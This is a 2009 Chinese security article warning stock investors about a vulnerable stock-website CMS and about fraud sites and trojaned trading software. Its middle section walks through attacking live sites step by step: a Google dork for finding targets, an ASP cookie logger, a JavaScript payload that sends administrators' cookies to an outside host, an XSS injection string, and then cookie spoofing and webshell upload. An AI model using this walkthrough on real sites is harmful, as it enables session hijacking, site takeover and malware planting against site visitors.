加入收藏·设为首页·会员中心·我要投稿·RSS
您当前的位置:首页 > 电子商务 > 支付安全

80%股票网站危及钱袋

时间:2009-07-20 00:29:17    来源:网络  作者:happy88

       短短几个月,股指从1600多点反弹到目前的2500左右,股市从“极度冰寒”转变成了“火热朝天”。这

段时间很多股民朋友赚钱了、开心了,但股票相关的安全形势却一天天严峻起来。

  从2月份以来,大量的股票诈骗网站不断冒出,“黑榜”连续几周都关注了此事、进行了道了,屏蔽了大

量股票诈骗网站。如果你觉得自己的安全意识比较好,不会上股票诈骗网站,可以安心炒股,这就有危险了

  为什么这么说呢?因为被大量网站使用的易为股票系统出现了严重的漏洞,其中一个漏洞可以用来挂马

,浏览网站的股民朋友就有可能中毒。如果中毒了,在进行交易时就有可能出现股票账户里面的现金不翼而

飞。

  以前的股票网站挂马都是不是股票系统出问题,所以影响范围不大,但现在是易为股票系统出问题了,

所有是有该系统的网站都可能被挂马,这不令人胆战心惊!那么,我们如何在险恶的网络环境中保护股票账

户的安全呢?

看了本文你会知道:

1. 如何避免浏览股票网站中毒
2. 怎么下载到没有病毒捆绑的股票软件
3. 识破股票诈骗网站的伪装

我们在百度中以“股票网站”为关键字进行搜索,在30个搜索出来的网站中,约有80%的网站使用了易为股票

系统,这个比例是相当的高了。目前网上有数百家使用该系统的股票网站。

  安全小百科:易为股票系统是一款股票网站的建站程序,使用该系统可以几步就建立一个股票网站。

  最近易为股票系统出现了严重的跨站及SQL注入漏洞,黑客通过漏洞可以轻易地获取使用该系统的网站中

所有的会员资料,并且能够以管理员权限进入到网站的后台,甚至可以在网页上挂马。网站被挂马后,用户

只要浏览网站即可能中毒。

  虽然一些特大型股票网站没有使用该系统,但数百家使用该系统的股票网站合起来的流量还是非常客观

的,拥有大量的用户,可以说很多股民朋友都身陷盗号的危险中。除了股票网站挂马,股票诈骗网站、捆绑

了病毒的股票软件都是股民朋友的需要注意的陷阱

股票系统出了两个漏洞

  作为一款知名的股票网站系统,出现如此严重的安全漏洞实在不应该,并且同时存在跨站漏洞和SQL注入

两个大漏洞。

  在易为股票系统中,有多处文本框没有进行字符过滤,尤其是其用户注册页面,例如“联系地址”和“

银行账号”,我们可以在其中输入<script>alert("测试!")</script>  这样的一句代码,当管理员浏览我

们的用户信息时,他的浏览器就会弹出“测试”的对话框。

  安全的网站系统是绝对不允许用户提交“</script>”类似的危险代码的,而易为却丝毫没有对用户提交

的危险代码进行限制,因此产生了严重的跨站漏洞。这个漏洞可以被用来挂马。

  另一个严重的漏洞是SQL注入漏洞,问题出在网站的分栏浏览页面,同样是因为程序员的疏忽,没有对页

面中的变量进行过滤,从而导致了漏洞的发生,黑客可以通过特殊的语句猜解网站数据库中的内容,从而得

到重要的的资料,例如所以用户的的注册信息。

股票网站入侵揭秘

方法1:跨站挂马

  挂马流程:通过技术手段获取网站管理员的Cookie值→利用的Cookie值进行欺骗成功进入网站后台→在

后台寻找机会上传asp木马→利用asp木马修改网站文件→插入挂马代码。

第一步:寻找入侵目标

  我们在百度或Google中以“inurl:gp_nl.asp”为关键字进行搜索(图1),可以找到很多符合条件的网

站,由于漏洞是最近才被发现的,因此很多网站都还没来得及打上补丁,我们可以随便寻找一个进行测试。


  我们选择一个目标,它的Google的PR值为5(图2),网站排名系统Alexa中的平均排名在7万名左右(图3

),跟一些大型网站比起来小了点,但每天通过这套网站系统浏览网页的股民估计有数十万人次。

  安全小百科: PR是PageRank的简称,它是Google排名运算法则(排名公式)的一部分,用来标识网页的

等级和重要性。从1到10共分10个等级,其值越高,说明网站越受欢.

第二步:构建获取Cookie值的文件

  入侵第一步就是要获取网站管理员的Cookie值,因此我们需要构造一个获取管理员Cookie值的文件。新

建一个本文文件,输入如下内容:

<%
u=request("u")
co=request("co")
set fso=server.CreateObject("Scripting.FileSystemObject")
set txtfso=fso.OpenTextFile(server.mappath("ririri.txt"),8,True)
txtfso.WriteLine("[url="&u]url:"&u[/url])
txtfso.WriteLine("cookie:"&co)
txtfso.WriteLine("time:"&now())
txtfso.WriteLine("---------------")
txtfso.close
response.end
%>

  输入完毕后将文件保存为Cookie.asp。将其上传到自己的网站空间里,然后我们再新建一个文本文件,

输入:u="http://www.***.com/hack/Cookie.asp?u="+location.href+"&co="+document.cookie+"'";
document.write ("<script src='"+u+"'></script>")

  其中www.***.com为网站空间的域名,将这个文件保存为hack.js,将它和Cookie.asp上传到同一目录中

第三步:插入跨站语句

  打开测试网站,在首页中点击“注册会员”按钮,在注册页面中填写基本的信息(图4),我们可以在其

中任意一个文本框中插入代码,可见程序的安全性非常的低。跨站的代码为:

"><script src="http://www.***.com/hack/j.js"></script>


  填写完毕后进行注册即可。接下来我们要做的就是等待,只要管理员在后台查看会员资料,我们就可以

拿到管理员的Cookie值。

第四步:Cookie欺骗

  当管理员查看会员资料后,我们会在网站空间里的hack目录中找到一个名为hack.txt的文件,打开它,

管理员的Cookie信息乖乖地躺在里面呢(图5)。


  得到管理员的Cookie信息后,我们就可以利用它来进行Cookie欺骗了。拿出强大的黑客工具“啊D注入工

具”,我们将会使用到它的Cookie欺骗功能,当然其他具有Cookie欺骗功能的工具也是可以的,例如“桂林

老兵Cookie欺骗工具”。

   运行“啊D注入工具”,进入到“扫描注入点”功能处,通过其内置的浏览器打开网站,用自己原先注

册的账户进行登录。这时我们点击右侧的“Cookie 修改”按钮,将会出现当前账户的Cookie值。我们用获取

到的管理员账户Cookie值替换当前的Cookie值,点击“修改”按钮(图6)。刷新一下,我们会发现权限已经

成为管理员了,并且可以登录后台进行操作。

  至此,我们已经拿到了网站的管理员权限,接下来就是通过后台上传webshell,并且将配置好的网页木

马插入到网站页面中。虽然黑客要从入侵到挂马需要进行好几个步骤,但是从插入跨站代码的步骤来看,程

序的安全性是非常不够的。相信还会有更多的漏洞埋藏在程序中没有被发掘。


    方法2:SQL攻击获取注册信息

  这种方法相对较简单,因为攻击工具已经在网上可以找到了,不过要价较高。直接运行《易为股票注射

漏洞利用工具》,在“网站地址”中填入攻击目标的网址,点击“开始猜解”按钮即可,工具会自动完成猜

解(图7)。


  需要注意的是,对于SQL注入,易为股票系统对用户密码进行过二次加密,因此破解管理员账户密码的成

功率不高,但是我们却可以通过SQL注入获取整个网站的所有注册会员信息。别小看这些信息,黑客利用它进

行社会工程学攻击,危害也是十分巨大的。


掀翻股票安全头上“三座大山”

  当前,股票网站挂马、股票诈骗网站频出、股票软件带毒是压迫广大股民朋友的“三座大山”,如何从

“三座大山”的压迫中解放出来呢?不用着急,请看下文。

开山,扫清网页木马

  要避免网页木马的黑手,是一个相当复杂的工作。首先,要选要杀毒能力较强的择杀毒软件,特别是对

中国本土病毒有较高的查杀率。杀毒软件对网页木马的拦截能力是一个很重要的指标,大家也要重点考虑。

  目前杀毒软件对网页木马的拦截参差不齐,为了保险起见大家还是使用具有网页木马拦截功能的安全辅

助工具,安装了这种工具,在访问挂马网页时,会自动屏蔽病毒,防止病毒进入电脑中。

  此外,还可以使用账号保护工具,这样即使病毒进入了电脑,但因为你是通过账号保护工具启动网银或

者股票交易软件的,会大大降低账号被盗的风险,特别是键盘记录类盗号病毒防范效果最好。

     排山,识破股票诈骗

  股票诈骗网站有几个很鲜明的特征,只要认清了这些特征,就不会上当受骗。

特征1:宣称能预测股票的涨跌

  绝大多数股票诈骗网站都有这个特征,不同的是夸张的程度不同。有的网站号称能通过独家技术,分析

出股票的拐点;有的网站则宣称自己有内幕消息,可以提前预知股票的涨跌。一般看到这样的宣传,网站是

诈骗网站的可能性非常大。

特征2:注册会员后保证收益

  所有的股票诈骗网站都有这个特征,基本上没有例外。收益一般都是非常惊人的,而且时间非常短,可

以说注册成为网站的会员就可以一夜暴富。例如,海东方股票研究所http://www.755766.cn,这个网站宣称

加入会员后可以100%盈利,大肆鼓吹自己成功预测了哪些股票的涨停板(图8)。


特征3:冒充证券公司网站

  冒充证券公司网站是当前不法分子最热衷的手段。一般人不会想到证券公司网站有问题,所以此类网站

层出不穷。特别是在今年股市开始回温之后,大量的假冒证券公司网站涌现。大家要看股票资讯最好到国内

知名的证券公司网站。例如,www.th558.com网站号称“中国最具操作性”的网站,天天提供上涨的黑马,20

个交易内保证获利60%~120%(图9)。


特征4:没有进行网络备案

  所有的股票诈骗网站也都有这个特征。不法分子根本不敢去进行网络备案,都是会采取伪造网络备案号

的方式来迷惑用户。所以要是破股票诈骗网站,可以去网络备案系统查询,地址是

http://www.miibeian.gov.cn,进去后,点击“公共查询”,再点击“公共信息查询”,在“备案/许可证号

”中输入备案号即可进行查询(图10)。


移山,清除股票软件中的病毒

  股票软件捆绑病毒,并不是什么秘密,特别是一些免费的股票软件很多都带有病毒,这些病毒都是跟股

票交易相关的盗号病毒,例如股票大盗。这些传播病毒的方式针对性强,隐蔽性高,不过对付起来也容易。

破解版、绿色版,这两种股票软件版本里面大多数都含有盗号病毒,不要轻易使用。此外,最好到知名网站

去下载软件,下载后最好用杀毒软件进行一次扫描再用。

文章标签: 相关文章
发表评论 共有 条评论
用户名: 密码:
验证码:   匿名发表
精彩美文推荐
栏目更新
栏目热门